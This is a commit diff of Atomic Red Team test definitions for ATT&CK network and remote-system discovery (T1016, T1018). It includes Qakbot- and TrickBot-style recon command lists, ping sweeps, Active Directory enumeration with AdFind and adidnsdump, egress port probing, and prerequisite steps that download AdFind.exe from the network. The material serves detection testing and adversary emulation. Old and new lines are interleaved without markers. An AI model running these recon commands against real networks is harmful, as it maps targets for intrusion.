## Atomic Test #2 - System Network Configuration Discovery
Identify network configuration information
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
#### Attack Commands: Run with `sh`!
```sh
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
#### Run it with `sh`!
```
<br/>
<br/>
## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)
Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
#### Attack Commands: Run with `command_prompt`!
```cmd
ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts
arp -a
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
ifconfig
```
<br/>
<br/>
## Atomic Test #5 - List Open Egress Ports
This is to test for what ports are open outbound. The technique used was taken from the following blog:
https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/
Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt.
**Supported Platforms:** Windows
**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to write port scan results | Path | $env:USERPROFILE&#92;Desktop&#92;open-ports.txt|
| portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
| port_file | The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. | Path | PathToAtomicsFolder&#92;T1016&#92;src&#92;top-128.txt|
#### Attack Commands: Run with `powershell`!
```powershell
$ports = Get-content #{port_file}
$file = "#{output_file}"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
$test = new-object system.Net.Sockets.TcpClient
$wait = $test.beginConnect("allports.exposed", $port, $null, $null)
$wait.asyncwaithandle.waitone(250, $false) | Out-Null
$totalports++ | Out-Null
if ($test.Connected) {
$result = "$port open"
Write-Host -ForegroundColor Green $result
$result | Out-File -Encoding ASCII -append $file
$totalopen++ | Out-Null
}
else {
$result = "$port closed"
Write-Host -ForegroundColor Red $result
$totalclosed++ | Out-Null
$result | Out-File -Encoding ASCII -append $file
}
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -append $file
Write-Host $results
```
#### Cleanup Commands:
```powershell
Remove-Item -ErrorAction ignore "#{output_file}"
```
#### Dependencies: Run with `powershell`!
##### Description: Test requires #{port_file} to exist
##### Check Prereq Commands:
```powershell
if (Test-Path "#{port_file}") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
```
<br/>
<br/>
## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
#{adfind_path} -f (objectcategory=subnet)
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
```
<br/>
<br/>
## Atomic Test #7 - Qakbot Recon
A list of commands known to be performed by Qakbot for recon purposes
**Supported Platforms:** Windows
**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder&#92;T1016&#92;src&#92;qakbot.bat|
#### Attack Commands: Run with `command_prompt`!
```cmd
#{recon_commands}
```
<br/>
<br/>
## Atomic Test #8 - List macOS Firewall Rules
"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows.
Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user.
Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
**Supported Platforms:** macOS
**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)
```bash
sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
```
<br/>
atomics/T1016/T1016.yaml
+14 -159
View File
@@ -1,180 +1,35 @@
---
attack_technique: T1016
display_name: System Network Configuration Discovery
atomic_tests:
- name: System Network Configuration Discovery on Windows
auto_generated_guid: 970ab6a1-0157-4f3f-9a73-ec4166754b23
- name: System Network Configuration Discovery
description: |
Identify network configuration information
Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.
supported_platforms:
- windows
- windows
executor:
name: command_prompt
command: |
ipconfig /all
netsh interface show interface
netsh interface show
arp -a
nbtstat -n
net config
name: command_prompt
- name: List Windows Firewall Rules
auto_generated_guid: 038263cb-00f4-4b0a-98ae-0696c67e1752
description: |
Enumerates Windows Firewall Rules using netsh.
Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.
supported_platforms:
- windows
executor:
command: |
netsh advfirewall firewall show rule name=all
name: command_prompt
- name: System Network Configuration Discovery
auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17
description: |
Identify network configuration information.
Identify network configuration information
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
supported_platforms:
- macos
- linux
- macos
- linux
executor:
command: |
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
name: sh
- name: System Network Configuration Discovery (TrickBot Style)
auto_generated_guid: dafaf052-5508-402d-bf77-51e0700c02e2
description: |
Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/
Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.
supported_platforms:
- windows
executor:
command: |
ipconfig /all
net config workstation
net view /all /domain
nltest /domain_trusts
name: command_prompt
- name: List Open Egress Ports
auto_generated_guid: 4b467538-f102-491d-ace7-ed487b853bf5
description: |
This is to test for what ports are open outbound. The technique used was taken from the following blog:
https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/
Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path of file to write port scan results
type: Path
default: $env:USERPROFILE\Desktop\open-ports.txt
portfile_url:
description: URL to top-128.txt
type: Url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt
port_file:
description: The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap.
type: Path
default: PathToAtomicsFolder\T1016\src\top-128.txt
dependency_executor_name: powershell
dependencies:
- description: |
Test requires #{port_file} to exist
prereq_command: |
if (Test-Path "#{port_file}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
executor:
command: |
$ports = Get-content #{port_file}
$file = "#{output_file}"
$totalopen = 0
$totalports = 0
New-Item $file -Force
foreach ($port in $ports) {
$test = new-object system.Net.Sockets.TcpClient
$wait = $test.beginConnect("allports.exposed", $port, $null, $null)
$wait.asyncwaithandle.waitone(250, $false) | Out-Null
$totalports++ | Out-Null
if ($test.Connected) {
$result = "$port open"
Write-Host -ForegroundColor Green $result
$result | Out-File -Encoding ASCII -append $file
$totalopen++ | Out-Null
}
else {
$result = "$port closed"
Write-Host -ForegroundColor Red $result
$totalclosed++ | Out-Null
$result | Out-File -Encoding ASCII -append $file
}
}
$results = "There were a total of $totalopen open ports out of $totalports ports tested."
$results | Out-File -Encoding ASCII -append $file
Write-Host $results
cleanup_command: |
Remove-Item -ErrorAction ignore "#{output_file}"
name: powershell
- name: Adfind - Enumerate Active Directory Subnet Objects
auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
description: |
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
supported_platforms:
- windows
input_arguments:
adfind_path:
description: Path to the AdFind executable
type: Path
default: PathToAtomicsFolder\T1087.002\src\AdFind.exe
dependency_executor_name: powershell
dependencies:
- description: |
AdFind.exe must exist on disk at specified location (#{adfind_path})
prereq_command: |
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
executor:
command: |
#{adfind_path} -f (objectcategory=subnet)
name: command_prompt
- name: Qakbot Recon
auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b
description: A list of commands known to be performed by Qakbot for recon purposes
supported_platforms:
- windows
input_arguments:
recon_commands:
description: File that houses list of commands to be executed
type: Path
default: PathToAtomicsFolder\T1016\src\qakbot.bat
executor:
command: |
#{recon_commands}
name: command_prompt
- name: List macOS Firewall Rules
auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88
description: |
"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows.
Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user.
Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out.
supported_platforms:
- macos
executor:
command: |
sudo defaults read /Library/Preferences/com.apple.alf
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
name: bash
elevation_required: true
arp -a
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
ifconfig
atomics/T1016/src/qakbot.bat
-11
View File
@@ -1,11 +0,0 @@
whoami /all
cmd /c set
arp -a
ipconfig /all
net view /all
nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.WORKGROUP
nslookup -querytype=ALL -timeout=10 _ldap._tcp.dc._msdcs.DomainName
net share
route print
netstat -nao
net localgroup
atomics/T1016/src/top-128.txt
-128
View File
@@ -1,128 +0,0 @@
7
9
13
17
19
21
22
23
25
26
37
53
79
80
81
82
88
106
110
111
113
119
135
139
143
144
179
199
255
389
427
443
444
445
465
513
514
515
543
544
548
554
587
631
636
646
808
873
990
993
995
1000
1024
1025
1026
1027
1028
1029
1030
1031
1038
1041
1071
1110
1433
1720
1723
1755
1801
2000
2001
2049
2103
2105
2107
2121
2601
2717
3000
3001
3128
3306
3389
3689
3703
3986
4899
5000
5001
5009
5060
5101
5190
5357
5432
5631
5666
5800
5900
5901
6000
6001
6004
6646
7000
7070
8000
8008
8009
8031
8080
8081
8443
8888
9000
9090
9100
9102
9999
10000
10010
32768
49152
49153
49154
49155
49156
49157
atomics/T1018/T1018.md
+36 -401
View File
@@ -1,460 +1,95 @@
# T1018 - Remote System Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
<blockquote>Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) in order to discover the hostname to IP address mappings of remote systems.
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1018)
<blockquote>Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Specific to macOS, the <code>bonjour</code> protocol exists to discover additional Mac-based systems within the same broadcast domain.</blockquote>
### Windows
Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039).
### Mac
Specific to Mac, the <code>bonjour</code> protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems.
### Linux
Utilities such as "ping" and others can be used to gather information about remote systems.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Remote System Discovery - net](#atomic-test-1---remote-system-discovery---net)
- [Atomic Test #2 - Remote System Discovery - net group Domain Computers](#atomic-test-2---remote-system-discovery---net-group-domain-computers)
- [Atomic Test #2 - Remote System Discover - ping sweep](#atomic-test-2---remote-system-discover---ping-sweep)
- [Atomic Test #3 - Remote System Discovery - nltest](#atomic-test-3---remote-system-discovery---nltest)
- [Atomic Test #3 - Remote System Discover - arp](#atomic-test-3---remote-system-discover---arp)
- [Atomic Test #4 - Remote System Discovery - ping sweep](#atomic-test-4---remote-system-discovery---ping-sweep)
- [Atomic Test #4 - Remote System Discovery - arp nix](#atomic-test-4---remote-system-discovery---arp-nix)
- [Atomic Test #5 - Remote System Discovery - arp](#atomic-test-5---remote-system-discovery---arp)
- [Atomic Test #6 - Remote System Discovery - arp nix](#atomic-test-6---remote-system-discovery---arp-nix)
- [Atomic Test #7 - Remote System Discovery - sweep](#atomic-test-7---remote-system-discovery---sweep)
- [Atomic Test #8 - Remote System Discovery - nslookup](#atomic-test-8---remote-system-discovery---nslookup)
- [Atomic Test #9 - Remote System Discovery - adidnsdump](#atomic-test-9---remote-system-discovery---adidnsdump)
- [Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects](#atomic-test-10---adfind---enumerate-active-directory-computer-objects)
- [Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects](#atomic-test-11---adfind---enumerate-active-directory-domain-controller-objects)
- [Atomic Test #5 - Remote System Discovery - sweep](#atomic-test-5---remote-system-discovery---sweep)
<br/>
## Atomic Test #1 - Remote System Discovery - net
Identify remote systems with net.exe.
Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
Identify remote systems with net.exe
**Supported Platforms:** Windows
**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
#### Attack Commands: Run with `command_prompt`!
```cmd
#### Run it with `command_prompt`!
```
net view /domain
net view
```
<br/>
<br/>
## Atomic Test #2 - Remote System Discovery - net group Domain Computers
Identify remote systems with net.exe querying the Active Directory Domain Computers group.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
## Atomic Test #2 - Remote System Discover - ping sweep
Identify remote systems via ping sweep
**Supported Platforms:** Windows
**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
#### Attack Commands: Run with `command_prompt`!
```cmd
net group "Domain Computers" /domain
#### Run it with `command_prompt`!
```
<br/>
<br/>
## Atomic Test #3 - Remote System Discovery - nltest
Identify domain controllers for specified domain.
Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_domain | Domain to query for domain controllers | String | domain.local|
#### Attack Commands: Run with `command_prompt`!
```cmd
nltest.exe /dclist:#{target_domain}
```
<br/>
<br/>
## Atomic Test #4 - Remote System Discovery - ping sweep
Identify remote systems via ping sweep.
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
#### Attack Commands: Run with `command_prompt`!
```cmd
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
```
<br/>
<br/>
## Atomic Test #5 - Remote System Discovery - arp
Identify remote systems via arp.
Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
## Atomic Test #3 - Remote System Discover - arp
Identify remote systems via arp
**Supported Platforms:** Windows
**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
#### Attack Commands: Run with `command_prompt`!
```cmd
#### Run it with `command_prompt`!
```
arp -a
```
<br/>
<br/>
## Atomic Test #6 - Remote System Discovery - arp nix
Identify remote systems via arp.
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
## Atomic Test #4 - Remote System Discovery - arp nix
Identify remote systems via arp
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
#### Attack Commands: Run with `sh`!
```sh
#### Run it with `sh`!
```
arp -a | grep -v '^?'
```
#### Dependencies: Run with `sh`!
##### Description: Check if arp command exists on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
echo "Install arp on the machine."; exit 1;
```
<br/>
<br/>
## Atomic Test #7 - Remote System Discovery - sweep
Identify remote systems via ping sweep.
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
## Atomic Test #5 - Remote System Discovery - sweep
Identify remote systems via ping sweep
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| start_host | Subnet used for ping sweep. | string | 1|
| stop_host | Subnet used for ping sweep. | string | 254|
| subnet | Subnet used for ping sweep. | string | 192.168.1|
#### Attack Commands: Run with `sh`!
```sh
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
#### Run it with `sh`!
```
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
```
<br/>
<br/>
## Atomic Test #8 - Remote System Discovery - nslookup
Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.
Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
```
<br/>
<br/>
## Atomic Test #9 - Remote System Discovery - adidnsdump
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will list dns zones in the terminal.
**Supported Platforms:** Windows
**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username including domain. | string | domain&#92;user|
| acct_pass | Account password. | string | password|
| host_name | hostname or ip address to connect to. | string | 192.168.1.1|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```powershell
if (python --version) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```powershell
if (pip3 -V) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
echo "PIP must be installed manually"
```
##### Description: adidnsdump must be installed and part of PATH
##### Check Prereq Commands:
```powershell
if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
pip3 install adidnsdump
```
<br/>
<br/>
## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
#{adfind_path} -f (objectcategory=computer)
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
```
<br/>
<br/>
## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
#### Attack Commands: Run with `command_prompt`!
```cmd
#{adfind_path} -sc dclist
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
##### Check Prereq Commands:
```powershell
if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
```
<br/>
atomics/T1018/T1018.yaml
+31 -194
View File
@@ -1,230 +1,67 @@
---
attack_technique: T1018
display_name: Remote System Discovery
atomic_tests:
- name: Remote System Discovery - net
auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd
description: |
Identify remote systems with net.exe.
Identify remote systems with net.exe
Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.
supported_platforms:
- windows
- windows
executor:
name: command_prompt
command: |
net view /domain
net view
name: command_prompt
- name: Remote System Discovery - net group Domain Computers
auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f
description: |
Identify remote systems with net.exe querying the Active Directory Domain Computers group.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.
supported_platforms:
- windows
executor:
command: |
net group "Domain Computers" /domain
name: command_prompt
- name: Remote System Discovery - nltest
auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
- name: Remote System Discover - ping sweep
description: |
Identify domain controllers for specified domain.
Identify remote systems via ping sweep
Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
supported_platforms:
- windows
input_arguments:
target_domain:
description: Domain to query for domain controllers
type: String
default: domain.local
- windows
executor:
command: |
nltest.exe /dclist:#{target_domain}
name: command_prompt
- name: Remote System Discovery - ping sweep
auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592
description: |
Identify remote systems via ping sweep.
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
supported_platforms:
- windows
executor:
command: |
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
name: command_prompt
- name: Remote System Discovery - arp
auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
description: |
Identify remote systems via arp.
Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
- name: Remote System Discover - arp
description: |
Identify remote systems via arp
supported_platforms:
- windows
- windows
executor:
name: command_prompt
command: |
arp -a
name: command_prompt
- name: Remote System Discovery - arp nix
auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
description: |
Identify remote systems via arp.
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
- name: Remote System Discovery - arp nix
description: |
Identify remote systems via arp
supported_platforms:
- linux
- macos
dependency_executor_name: sh
dependencies:
- description: |
Check if arp command exists on the machine
prereq_command: |
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
echo "Install arp on the machine."; exit 1;
- linux
- macos
executor:
name: sh
command: |
arp -a | grep -v '^?'
name: sh
- name: Remote System Discovery - sweep
auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
description: |
Identify remote systems via ping sweep.
Identify remote systems via ping sweep
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
supported_platforms:
- linux
- macos
input_arguments:
start_host:
description: Subnet used for ping sweep.
type: string
default: "1"
stop_host:
description: Subnet used for ping sweep.
type: string
default: "254"
subnet:
description: Subnet used for ping sweep.
type: string
default: 192.168.1
- linux
- macos
executor:
command: |
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
name: sh
- name: Remote System Discovery - nslookup
auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
description: |
Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.
Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
supported_platforms:
- windows
executor:
command: |
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
name: powershell
elevation_required: true
- name: Remote System Discovery - adidnsdump
auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959
description: |
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will list dns zones in the terminal.
supported_platforms:
- windows
input_arguments:
user_name:
description: username including domain.
type: string
default: 'domain\user'
acct_pass:
description: Account password.
type: string
default: "password"
host_name:
description: hostname or ip address to connect to.
type: string
default: "192.168.1.1"
dependency_executor_name: powershell
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
if (python --version) {exit 0} else {exit 1}
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Computer must have pip installed
prereq_command: |
if (pip3 -V) {exit 0} else {exit 1}
get_prereq_command: |
echo "PIP must be installed manually"
- description: |
adidnsdump must be installed and part of PATH
prereq_command: |
if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
get_prereq_command: |
pip3 install adidnsdump
executor:
command: |
adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
name: command_prompt
elevation_required: true
- name: Adfind - Enumerate Active Directory Computer Objects
auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4
description: |
